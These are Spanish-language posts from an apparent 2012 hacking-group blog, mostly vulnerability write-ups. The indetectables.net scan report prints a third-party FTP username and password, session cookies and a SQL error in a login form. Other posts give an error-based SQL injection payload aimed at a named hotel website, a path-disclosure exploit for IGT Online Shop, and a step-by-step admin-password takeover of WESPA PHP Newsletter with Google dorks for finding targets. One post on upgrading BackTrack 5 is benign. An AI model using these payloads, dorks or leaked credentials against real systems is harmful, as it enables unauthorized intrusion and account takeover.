lunes, 4 de junio de 2012


04/06/2012

indetectables.net vulnerability detected


Era una mañana [4 - de - julio - del - 2012]. Después de un tiempo no suelo hacer daño ni de hacernos famosos, esto  está dedicado  -= Security Warriors Team =- saludos a todos sus miembros. Nosotros siempre andamos detectando bugs para explotar, y hacer aver que se puede sacar o reportar el error a los webmasters de dichas webs. En este caso , como decía era una mañana, andaba preparando mis herramientas para empezar hacer mis escans y de casualidad en google me encontré con este tema http://www.indetectables.net/index.php?id=2565823 , normal leía y que tenia una lista de paginas webs en un archivo txt y yo suelo guardar url importantes de temas buenos y por casualidad avía copiado la URL de indetectables.net y le di pegar al formulario scans de una tool y empezó muy rápido y no dude en dejarlo hay que corriera y empiece a escanear no ! , el tiempo pasaba despues de 10 minutos mire, ve una bug vamos aver ! : veamos esa linea roja : Indica una vulne y luego vendrán mas !


Revisamos las de mas . la primera vulnerabilidad seria


Nada mas y nada menos que un http:AuthDetect 
y en HTTP Credentials encontramos eso que vemos en la imagen - un servidor FTP al aire libre con un user y pass , al principio miraba luego analizando en mas de una vez salio esto que pedimos solucionar a l webmaster de indetectables. 

The resource: "http://www.indetectables.net/viewtopic.php" has a user and password in the body. 
The offending URL is: "ftp://helijurado:el7ju3si@pwp.etb.net.co/my.gif".
 This vulnerability was found in the request with id 275.





  Usando un poco nuestro cerebro en esa url   
      : Creo que saldria una imagen gif de unos monstruos de diferentes caras, y al redireccionar quedaria la URL limpia del servidor FPT que en REALIDAD es un Disco Virtual con total acceso  ftp://pwp.etb.net.co         user - 
helijurado - paw
el7ju3si 
- 1. GIf en pantalla : 

- 2 url - ftp : 



3- dentro : - 



Al parecer se trata de un almcen de imágenes gif . 





ok también en el reporte se obtiene : 
GET http://www.indetectables.net/viewtopic.php?start=105&t=22778&f=32 HTTP/1.1
Accept-encoding: gzip
Accept: */*
Host: www.indetectables.net
Cookie: Indetect_sid=18a318351569d8b448d49c177c0c0025; Indetect_u=1; Indetect_k=; __cfduid=d87523eb6bbef0e1379c99e4c57709b6a1338817076; __cfduid=d87523eb6bbef0e1379c99e4c57709b6a1338817076; c961072f8116c552bd83=1950c08d9fbd0d7b83f8
Referer: http://www.indetectables.net/


Se obtiene un Cookie muy explotable para no alargar mas esto creo que lo admins ya sabrán que hacer. Seguimos ya me iva pero al mirar mas abajo encontramos una de las vulnerabilidades mas Reconocidas y explotables - SQLi - : 




Se obtiene está vulnerabilidad e incluyendo un cookie que en sqlmap se arian maravillas, podemos apresiar la url + el clásico method POST y abajo unas variables y mas abajo vemos el código de fuente del login que es el que seria el vulnerable :
 1. 
POST http://www.indetectables.net/ucp.php?mode=login HTTP/1.1
Accept-encoding: gzip
Accept: */*
Host: www.indetectables.net
Cookie: Indetect_sid=409c237d87da4bfa58ff2d4593eb6c8c; Indetect_u=1; Indetect_k=; __cfduid=d87523eb6bbef0e1379c99e4c57709b6a1338817076; __cfduid=d87523eb6bbef0e1379c99e4c57709b6a1338817076; c961072f8116c552bd83=1950c08d9fbd0d7b83f8
Referer: http://www.indetectables.net/
Content-type: application/x-www-form-urlencoded

C.FUENTE : QUE ES DONDE VEMOS EL ERROR PRODUCIDO Y QUE DES PUES SE COMPRUEBA EN LA WEB YA QUE NOS ARROJARÍA EL ERROR : 
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Error General</title><style type="text/css">
/* <![CDATA[ */
* { margin: 0; padding: 0; } html { font-size: 100%; height: 100%; margin-bottom: 1px; background-color: #E4EDF0; } body { font-family: "Lucida Grande", Verdana, Helvetica, Arial, sans-serif; color: #536482; background: #E4EDF0; font-size: 62.5%; margin: 0; } a:link, a:active, a:visited { color: #006699; text-decoration: none; } a:hover { color: #DD6900; text-decoration: underline; } #wrap { padding: 0 20px 15px 20px; min-width: 615px; } #page-header { text-align: right; height: 40px; } #page-footer { clear: both; font-size: 1em; text-align: center; } .panel { margin: 4px 0; background-color: #FFFFFF; border: solid 1px #A9B8C2; } #errorpage #page-header a { font-weight: bold; line-height: 6em; } #errorpage #content { padding: 10px; } #errorpage #content h1 { line-height: 1.2em; margin-bottom: 0; color: #DF075C; } #errorpage #content div { margin-top: 20px; margin-bottom: 5px; border-bottom: 1px solid #CCCCCC; padding-bottom: 5px; color: #333333; font: bold 1.2em "Lucida Grande", Arial, Helvetica, sans-serif; text-decoration: none; line-height: 120%; text-align: left; } 
/* ]]> */
</style></head><body id="errorpage"><div id="wrap"> <div id="page-header"> <a href="./">Volver a la página principal</a> </div> <div id="acp"> <div class="panel"> <div id="content"> <h1>Error General</h1> <div>SQL ERROR [ mysqli ]<br /><br />You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'z&quot;0";}'
AND log_ip = 'XXX.X1.123.XDX'
AND user_id = 1
' at line 5 [1064]<br /><br />Ocurrió un error SQL mientras recuperaba esta página. Por favor contacte con La Administración del Sitio<a href="mailto:indetectables.net@gmail.com"> si el problema persiste.</div><p>Por favor notifique a La Administración del Sitio o webmaster: <a href="mailto:indetectables.net@gmail.com">indetectables.net@gmail.com</a></p> </div> </div> </div> <div id="page-footer"> Powered by <a href="http://www.phpbb.com/">phpBB</a>&reg; Forum Software &copy; phpBB Group </div></div></body></html>

userd'z"0 
pass: d'z"0 


ERROR : 


[+]Reporte - [4 - de - julio - del - 2012] 
[+]indetectables.net vulnerability detected - by SWT
[+] by - system swt
[+] Team : Security Warriors Team - http://www.sewate.net/
[+]  Shellon Shelloncorp - Off Cirujano - Cronox - y todos los miembros 

jueves, 10 de mayo de 2012

creativeworks full injeccion sql bug


# Exploit Title:Creative Works Multiple sql web scripts

# Google Dork:Powered by: Creative Works

# Date:10-05-2012

# Author: sh3ll0n sewate.net

# Software Link:www.creativeworks.com.ec

# Version:2012

# Tested on:linux and windows any os

#credits:Security Warriors Team SWT http://www.facebook.com/groups/279352788763082/

descripcion:

index.php?idiom=sql injection

herramienta sqlmap test bug sql

code inject test: idiom=1 AND (SELECT 2358 FROM(SELECT COUNT(*),CONCAT(CHAR(58,121,118,106,58),(SELECT (CASE WHEN (2358=2358) THEN 1 ELSE 0 END)),CHAR(58,97,97,102,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

ejemplo:

http://www.hotelesecuador.com.ec/index.php?idiom=1%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,121,118,106,58),(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),CHAR(58,97,97,102,58),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)

creditos:cr0n0x de Security Warriors Team SWT

domingo, 4 de marzo de 2012

Actualizar a BackTrack 5 R2!

Actualizar a BackTrack 5 R2!

Hace poco en el blog oficial de Bactrack se posteó una entrada en donde nos enseñan los comandos y pasos necesarios para actualizar nuestro BackTrack 5 R1 a R2. Esencialmente actualizan el kernel al 3.2.6, agregan herramientas nuevas y algunos parches de seguridad. Aquí como hacer la actualización:

1.- Instalación para actualizar y mejorar BT5 (R1):
apt-get update
apt-get dist-upgrade
reboot
Se instaló el nuevo kernel y las actualizaciones de la versión R2 oficial. Es necesario reiniciar el sistema para que parta el kernel 3.2.6.

2.- OPCIONAL - Una vez reiniciado, pueden cambiar la consola de la pantalla de bienvenida.
fix-splash
reboot
Con el reinicio, deberían ver la consola de la pantalla de bienvenida aparece de color rojo.

3.- Comprobar que se está ejecutando el kernel 3.2.6:
uname -a
Deberían ver algo como "Linux bt 3.2.6 ..."

4.- Ahora pueden instalar cualquiera de las nuevas herramientas que trae BackTrack 5 R2:
apt-get install pipal findmyhash metasploit joomscan hashcat-gui golismero easy-creds pyrit sqlsus vega libhijack tlssled hash-identifier wol-e dirb reaver wce sslyze magictree nipper-ng rec-studio hotpatch xspy arduino rebind horst watobo patator thc-ssl-dos redfang findmyhash killerbee goofile bt-audit bluelog extundelete se-toolkit casefile sucrack dpscan dnschef

5.- Agragamos un nuevo repositorio de seguridad a /etc/apt/sources.list, y volvemos a actualizar:
echo "deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing" >> /etc/apt/sources.list
apt-get update
apt-get dist-upgrade
Aquí en todas las preguntas que les hagan pulsen "Enter" y aceptar todos los valores predeterminados.

6.- Por último, para que no hayan problemas desactivamos algunos servicios :
/etc/init.d/apache2 stop
/etc/init.d/cups stop
/etc/init.d/winbind stop

update-rc.d -f cups remove
update-rc.d -f apache2 remove
update-rc.d -f winbind remove

Y ya está todo listo, ahora tenemos nuestro BackTrack 5 R2 actualizado a la fecha!. En el blog oficial de Bactrack se promete el BT5 R2 en ISO para el 1 de mayo a través de Torrent.

Yo me demoré en total unos 35 min en actualizar. Espero les haya gustado y les sea útil.

Exploit Full path disclosure and Sql Error ONLINE SHOP IGT

# Exploit Title: Full path disclosure and Sql Error ONLINE SHOP IGT
# Date: 24/02/2012
# software: IGT Online Shop
# link: http://www.igt.com.hk
# Version: ALL
# Category: webapps
# Google dork: inurl:company_index.php
# Tested on: Linux



----------------
Vulnerability
----------------

Exploit:
======================

http://localhost/path/company_index.php?id=[ID#NUMBER]&file=home&prod=&uid=[FPD & ERROR SQL]

======================
Example:
======================

http://Mazt0rsite.com/company_index.php?id=245&file=home&prod=prod&uid=

Result FPD: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/Mazt0rsite/path/path2/public_html/company_index.php on line 3

Regular Result2: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 [PWNED XD]

"WESPA PHP Newsletter v3.0" Remote Admin Password Change With install Path"

ok empesemos es muy sencillo
1- Dork: intitle:"News list Administration panel"
intitle:"WESPA PHP Newsletter v3.0"

 2- Dirigirse a la url webconwespa.com/newsletter/admin.php


 
3- Borrar de la url "admin.php" y dirigirse a el PATH /newsletter/install/install1.php y nos imprimira la configuracion

4- En el campo de PASSWD podemos modificarlo por una contraseña nueva.

Config establecida

ImageBanana - Seleccin_006.png

Config editada
ImageBanana - Seleccin_007.png

5- una vez hecho estos cambios procedemos a guardar la config "NEXT STAGE" y "FINISH INSTALL".
ImageBanana - Seleccin_008.png
ImageBanana - Seleccin_009.png

6- Una vez hecho esto podemos dirigirnos a la pagina de Adm PATH:/newsletter/admin.php o simplemente click en: "Goto the admin page" como se muestra en la imagen, ingresamos los nuevos datos o los que visualizamos anteriormente en la config y ya estariamos dentro!.
ImageBanana - Seleccin_012.png
ImageBanana - Seleccin_013.png



 y listo de aqui usteds lo que puedan avisar alos dueño de este bug